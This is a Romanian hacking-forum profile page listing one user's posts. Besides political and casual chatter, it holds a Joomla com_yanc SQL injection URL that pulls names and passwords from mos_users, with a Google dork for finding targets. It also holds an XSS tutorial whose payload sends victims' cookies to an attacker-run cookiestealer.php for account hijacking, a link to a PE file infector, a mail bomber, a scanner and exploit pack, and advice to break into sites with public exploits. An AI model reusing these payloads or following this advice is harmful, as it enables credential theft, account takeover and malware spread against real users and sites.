Jump to content

vladiii

Active Members
  • Posts

    552
  • Joined

  • Last visited

Everything posted by vladiii

  1. nu, este si Form1.frm (codul sursa) si baza de date
  2. vladiii

    DA sau NU ?

    Ce a facut Basescu in 2 ani si jumatate : A vorbit deschis despre "baietii destepti" si grupurile de interese nelegitime din energie ( click ); A spart legea tacerii: 1,5 milioane de dosare ale securitatii au fost predate la CNSAS; Nu a negociat cu oligarhia politico-economica creata in 17 ani de tranzitie; A condamnat crimele comunismului; A aparat independenta justitiei; A cerut ca fondurile europene sa ajunga la agricultori si micii intreprinzatori, nu la clientela politica; A inceput batalia cu clientela politico-economica din sectorul energetic; A cerut introducerea votului uninominal ca solutie pentru insanatosirea clasei politice. NU demiterii lui Basescu !
  3. pai daca il downloadezi este CODUL (adica sursa)... este codul pus in Form1.frm Daca stii VB o sa iti dai seama p.s. acesta este unul simplu, al lui slick este ceva mai complicat
  4. nu este mare lucru, doar un ip locator dintr-o baza de date... codul este facut de mine si de inca un prieten (srdjan)... sper sa va foloseasca download code: http://rapidshare.com/files/32180660/ips.rar.html enjoy it!
  5. vladiii

    TM 8926

    e Monster Template ma, nu e facut de el si eu zic ca arata destul de bine si asa, web-designerule
  6. http://rstzone.net/forum/viewtopic.php?t=6473 :roll:
  7. vladiii

    a little hack

    http://c00l.ifastnet.com/vulnerabilitate.txt
  8. poate daca dai dos te prinde... gandeste-te un pic, ddosul este dat de pe sute de calculatoare, si ce ar fi sa afiseze ipul la fiecare? no way... nu se poate sa te prinda daca dai ddos
  9. vladiii

    parole default

    parole default la routere... stiam de el !!!
  10. http://rapidshare.com/files/25208129/VB_PE_Infection.rar.html The sample code just infects C:\test.exe with code to execute %sysdir%\hax.exe but with a little bit of work you can make it do whatever you want.
  11. ------------------------------------------------------------- Bulan: Cyber-Security ------------------------------------------------------------- Exploit: index.php?option=com_yanc&Itemid=9999999&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/* Example:http://www.tnrb.net/ ------------------------------------------------------------- google dork: inurl:index.php?option=com_yanc -------------------------------------------------------------
  12. eu l-am invins cine vrea sa joace sah cu mine sa imi dea un PM si vedem noi ce facem. merita vazut!
  13. ------------------------------------------------ Vulnerabilityes Scanners & Exploiters Pack v1.10 ------------------------------------------------ ::VulnScan & Expl0iters:: +Absinthe 1.3.1 Windows +AnonFTP Anonymous Scanner +Apache Scanner +CGI Scanner +DarkScanner 2.0 +FTP-IIS Fx Scanner +HScan 1.20 +HTTP Server Detector +ISS Internet Scanner v6.2.1 +JAAScoisX-Code RFI Code Exec Scanner +N-Stealth Security Scanner v3.7 Built 67 +RFI T00l +WebCheck +Win32 x86 RFI Vuln Scanner +X-Scan 3.3 +XSS LFI and File Discolure Scanner +Zehir Exploit Scanner +NetCat +NMap 4.20 ::Port Scanner:: +SuperScan 3.00 +SuperScan 4 ::Other Tools:: +QuickSpoof +PuTTy 0.60 Download from: [url]http://rapidshare.com/files/29886051/v_sp1.10.rar[/url] parola: uNkn0wn.eu AnD D4RK-R3V-T34M bafta!
  14. MailBomber, codat in visual basic de Neutralise si Shang1 http://rapidshare.com/files/31752507/MailerX.rar.html
  15. slick imi poti spune si mie ce dll ai folosit?
  16. nu inteleg Razvane ce nu intelegi din ceea ce am spus eu si flo_flow si din tutorialele video facute de slick... citeste-le cu atentie si ai sa intelegi cu siguranta! astept cereri! p.s. imi cer scuze daca o sa fac mai greu Mini-Tutorialele, dar am capacitatea anul acesta si trebuie sa ma ocup si de mate, romana si geogra
  17. am deschis alt topic pentru ca am vazut ca nu prea ai mai intrat pe forum (nu ai net)... ti-am explicat pe mess... cein, cum poti gasi xssurile ? In primul rand sunt sute de softuri web vulnerabile la XSS. Pentru a vedea cateva, uite aici: [url]http://www.milw0rm.org/exploits/3490[/url] [url]http://www.milw0rm.org/exploits/3447[/url] [url]http://www.milw0rm.org/exploits/1547[/url] Lista ar putea continua mult, insa nu vreau sa umplu forumul de linkuri de pe milw0rm.org, mai bine intra tu acolo, la functia Search si scrie XSS. Ai sa gasesti google dorks care apoi le poti incerca pe google pentru a gai siteuri vulnerabile. Poate te gandesti, "Da, dar cum gasesc siteuri vulnerabile la XSS singur, fara google dorks?". Deobicei, majoritatea vulnerabilitatilor se gasesc "surfand" pe un motor de cautare, dar ca sa gasesti tu una singur, ar fi bine sa cauti mai intai in functia de Cautare (Search) a siteurilor, de obicei acolo se gaseste aceasta vulnerabilitate. Hai sa iti dau cateva exemple, din alea intelegi cel mai bine: [url]http://www.hotbot.com/index.php?query=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&ps=&loc=searchbox&tab=web&currProv=msn&mode=?=&dfi=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&dfe=&region=&adf=[/url] http://www.lamit.ro/cautare/index.php?query=%3Cscript%3Ealert('xss')%3C/script%3E&type=simple De obicei, functia de Search "imparte" (daca pot sa zic asa) URL in mai multe parti, una dintre ele fiind partea in care arata ce am cautat noi. In exemplul de mai sus, query=... arata ce am cautat eu din browser, si apoi modifici URL'ul, inlocuind ... cu <script>alert('xss')</script> . Si ai gasit propriul tau XSS. Cam asta este baza. Pentru a pacali filtrerele web serverului sa permita adaugarea <script>alert('mesaj')</script> la URL, uneori trebuie sa encodezi URL'ul, pentru a face acest lucru si pentru a intelege ce face acel "calculator" cand encodeaza URL'ul tau, click pe urmatorul link: [url]http://www.blooberry.com/indexdot/html/topics/urlencoding.htm[/url] Sper ca am fost destul de explicit. Vlad Astept alte cereri.
  18. Un scurt tutorial pentru tine. De obicei, vulnerabilitatea XSS este legata de cookieuri si message boxuri. Sa presupunem ca am gasit un site vulnerabil la XSS. Fie acesta: http://mystuff.uk.ask.com/user/DisplaySignup?prod=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E Acest micut script adaugat la URL: <script>alert('XSS')</script> nu face nimic mai mult decat a insera un message box in pui tu un text care vrei. Spre exemplu modific <script>alert('xss')</script> cu <script>alert('vladiii')</script> . URL va arata in felul urmator: http://mystuff.uk.ask.com/user/DisplaySignup?prod=%22%3E%3Cscript%3Ealert(%22vladiii%22)%3C/script%3E Ok, decoamdata vulnerabilitatea nu face nimic, dar o putem exploata si mai mult. In loc de mesajul (XSS si vladiii) dintre cele 2 paranteze ale alertului (ale scriptului) putem introduce: document.cookie si javascriptul care trebuie bagat la URL va arata in felul urmator: <script>alert(document.cookie)</script>. Si in cazul XSSului nostru: http://mystuff.uk.ask.com/user/DisplaySignup?prod=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Acest script genereaza un Message Box in care se afla cookieurile tale. Acum intrebarea se pune, cum fac rost si de cookieurile altor useri, ca apoi sa ma loghez pe conturile lor folosind acest cookie ? Sa consideram urmatorul cod: <SCRIPT>location.href="http://www.siteultau.com/cookiestealer.php?c="+escape(document.cookie)</SCRIPT> Acest cod il introducem la url si il trimitem apoi (url'ul) la victima. Daca aceasta da click pe link, atunci cookieurile sale vor ramane la tine pe FTP sau ti se vor trimite pe mail, depinde cum este conceput stealerul. Exemplu de link: www.sitevulnerabil.com/pagvuln.php?ceva=<SCRIPT>location.href="http://www.siteultau.com/cookiestealer.php?c="+escape(document.cookie)</SCRIPT> Am spus mai sus ce face acest exemplu de link. Acum ne intrebam: "Cum imi feresc siteul de vulnerabilitati XSS?". Simplu, de obicei eliminarea metacaracterelor din codul sursa (<, >) si inlocuite cu & gt si & lt, dupa caz, etc. Cum te feresti tu impotriva atacurilor XSS??? Nu da click pe tot felul de linkuri ciudate si nu folosi Internet Explorer ca browser deoarece este plin de buguri (personal, iti recomand Mozilla Firefox) Linkuri utile: [url]http://www.blooberry.com/indexdot/html/topics/urlencoding.htm[/url] [url]http://rstzone.net/forum/viewtopic.php?t=6250[/url] [url]http://rstzone.net/forum/viewtopic.php?t=6233[/url] [url]http://ha.ckers.org/xss.html[/url] Sper ca ti-am fost de folos. Vlad
  19. Omule, pai nu prea stiu ce as putea spune despre exploituri, totul este atat de evident,,, De obicei gasesti diferite vulnerabilitati in siteul respectiv si exploitul o "exploateaza" si obtii privilegii pe site. De obicei, exploiturile sunt scrise in perl (.pl) sau in C (.c) !!! Deci practic, daca esti incepator, scanezi siteul cu un web scanner (iti recomand Acunetix) apoi folosesti un exploit pentru vulnerabilitatea respectiva (www.milw0rm.org o gramada de exploituri). Sunt sute de softuri web vulnerabile, de aceea cand vezi, spre exemplu la site intr-un colt Powered by X, este bine sa cauti un exploit pentru X. Nu stiu ce sa iti spun mai multe... Cred ca sa spargi un site cu un exploit este cea mai simpla modalitate de cracking. Sper ca ti-am fost oarecum de folos. Astept alte cereri, insa cu lucruri "ceva mai putin evidente" !!!!
  20. puteti sa imi cereti tutoriale despre orice si o sa incerc sa le fac. regula: +30 posturi. astept cereri ;d
  21. hehe
  22. vladiii

    Crackme

    primul meu program crackuit incep sa ma descurc
  23. g3o tin sa te contrazic ca opera este cel mai bun browser la toate categoriile. mozilla firefox abunda in addonuri, pe cand opera are foarte putine. securitate, sunt cam la fel, ce functioneaza pe mozilla firefox functioneaza si pe opera si invers. intradevar, opera are viteza un pic mai buna, insa asta nu-l face deloc un browser mai folosit. cat despre IE ce sa mai vorbim? e praf, securitate=0 si abia a auzit si el de taburi.
  24. Dificultate: minima Scop: aflarea parolei Limbajul in care l-am facut: visual basic download: http://rapidshare.com/files/30193123/CryptoMasters.exe.html crack it
  25. gaesti, langa bucuresti
×
×
  • Create New...